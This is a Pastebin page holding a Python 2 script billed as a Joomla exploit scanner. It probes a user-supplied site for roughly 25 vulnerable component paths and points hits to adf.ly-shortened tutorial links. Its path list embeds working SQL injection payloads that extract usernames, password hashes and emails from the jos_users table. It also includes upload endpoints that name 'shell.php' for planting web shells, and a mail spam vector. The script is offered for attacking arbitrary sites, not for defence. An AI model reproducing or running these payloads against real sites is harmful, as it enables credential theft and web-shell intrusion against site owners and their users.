SHARE
TWEET

Joomla Exploit Scanner Vunlerability

choirurrizal Dec 31st, 2016 62 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2. #Joomla! Exploit Scanner.
  3. #Coded by KING GECKO
  4. #BISMILLAH WE GANS
  5.  
  6.  
  7. import sys
  8. import urllib2
  9. import re
  10. import time
  11. import httplib
  12. import random
  13.  
  14. # Color Console
  15. W  = '\033[0m'  # white (default)
  16. R  = '\033[31m' # red
  17. G  = '\033[1;32m' # green bold
  18. O  = '\033[33m' # orange
  19. B  = '\033[34m' # blue
  20. P  = '\033[35m' # purple
  21. C  = '\033[36m' # cyan
  22. GR = '\033[37m' # gray
  23.  
  24. #Bad HTTP Responses
  25. BAD_RESP = [400,401,404]
  26.  
  27. def main(path):
  28.     print "[+] Testing:",host.split("/",1)[1]+path
  29.     try:
  30.         h = httplib.HTTP(host.split("/",1)[0])
  31.         h.putrequest("HEAD", "/"+host.split("/",1)[1]+path)
  32.         h.putheader("Host", host.split("/",1)[0])
  33.         h.endheaders()
  34.         resp, reason, headers = h.getreply()
  35.         return resp, reason, headers.get("Server")
  36.     except(), msg:
  37.         print "Error Occurred:",msg
  38.         pass
  39.  
  40. def timer():
  41.     now = time.localtime(time.time())
  42.     return time.asctime(now)
  43.  
  44. def slowprint(s):
  45.     for c in s + '\n':
  46.         sys.stdout.write(c)
  47.         sys.stdout.flush() # defeat buffering
  48.         time.sleep(8./90)
  49.  
  50. print G+"\n\t                 Joomla! Exploit Scanner"
  51. slowprint (R+"\n\t                 Coded By "+O+"KING GECKO EMANG GANS"+O)
  52. print W+"                  WE EMANG GANS"
  53.  
  54. xpls = { "images/artforms/attachedfiles/" : ["com_artforms","http://adf.ly/e3nes"],"index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1" : ["com_fabrik","http://adf.ly/e3luV"] , "index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,2,concat%28username,0x3a,password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--" : ["com_idoblog","http://adf.ly/e3m65"], "index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--" : ["com_ignitegallery","http://adf.ly/e3nA7"], "administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=shell.php" : ["com_maian15","http://adf.ly/e3kzf"], "administrator/components/com_maianmedia/charts/php-ofc-library/ofc_upload_image.php?name=shell.php" : ["com_maianmedia","http://adf.ly/e3l6O"] , "index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=" : ["com_media","http://adf.ly/e3lf7"], "administrator/components/com_redmystic/chart/tmp-upload-images/" : ["com_redmystic","http://adf.ly/e3lFf"], "index.php?option=com_users&view=registration" : ["com_user","http://adf.ly/e3lYt"], "index.php?option=com_jce" : ["JCE","link"] , "index.php?option=com_user&view=reset&layout=confirm" : ["com_user 2","http://adf.ly/e3kv0"] , "index.php?option=com_shohada&view=shohada" : ["com_shohada","http://adf.ly/e3kr3"], "index.php?option=com_smartformer" : ["com_smartformer","http://adf.ly/e3pI9"], "index.php?option=com_garyscookbook&func=newItem" : ["com_garyscookbook","http://adf.ly/e3rXR"],"index.php/component/osproperty/?task=agent_register" : ["com_osproperty","http://adf.ly/e3sVO"], "index.php?option=com_acymailing&gtask=archive&listid=" : ["com_acymailing [SQLi]","http://adf.ly/e4sYn"], "index.php?option=com_extplorer&action=show_error&dir=" : ["com_extplorer","http://adf.ly/e4tiP"] , "index.php?option=com_xmap&tmpl=component&Itemid=999&view=" : ["com_xmap" , "http://adf.ly/e4vV1"] , "index.php?option=com_content&task=blogcategory&id=60&Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users/*" : ["com_content [SQLi]" , "http://adf.ly/e4wKe"] , "/index.php?option=com_flippingbook&Itemid=28&book_id=null/**/union/**/select/**/null,concat(username,0x3e,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/jos_users/*" : ["com_flippingbook [SQLi]" , "http://adf.ly/e4wUM"] , "index.php?option=com_phocagallery&view=categories&Itemid=" : ["com_phocagallery" , "http://adf.ly/e4wlq"] , "index.php?option=com_lyftenbloggie&author=62+union+select+1,concat_ws(0x3a,username,password),3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+jos_users--" : ["com_lyftenbloggie [SQLi]" , "http://adf.ly/e4wzk"] , "index.php?option=com_wrapper&view=wrapper&Itemid=":["com_wrapper","http://adf.ly/e4xjq"] , "index.php?option=com_fireboard&Itemid=":["com_fireboard","http://adf.ly/e4yf8"], "j/index.php?option=com_mailto&tmpl=component&template=beez_20&link=":["com_mailto [SPAM]","http://adf.ly/e4yyi"]}
  55.  
  56. if len(sys.argv) != 2:
  57.     print "\nUsage: python jx.py <site>"
  58.     print "Example: python jx.py www.site.com/\n"
  59.     sys.exit(1)
  60.  
  61. host = sys.argv[1].replace("http://","").rsplit("/",1)[0]
  62. if host[-1] != "/":
  63.     host = host+"/"
  64.    
  65. print "\n[+] Target:",host
  66. print "[+] Exploit Loaded:",len(xpls)
  67.  
  68. print "\n[+] Scanning Exploit\n"
  69. for xpl,(poc,expl) in xpls.items():
  70.     resp,reason,server = main(xpl)
  71.     if resp not in BAD_RESP:
  72.         print ""
  73.         print G+"\t[+] Result:",resp, reason
  74.         print G+"\t[+] Exploit:",poc
  75.         print G+"\t[+] Tutorial:",expl
  76.         print W
  77.     else:
  78.         print ""
  79.         print R+"\t[-] Result:",resp, reason
  80.         print W
  81. print "\n[-] Done\n"
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top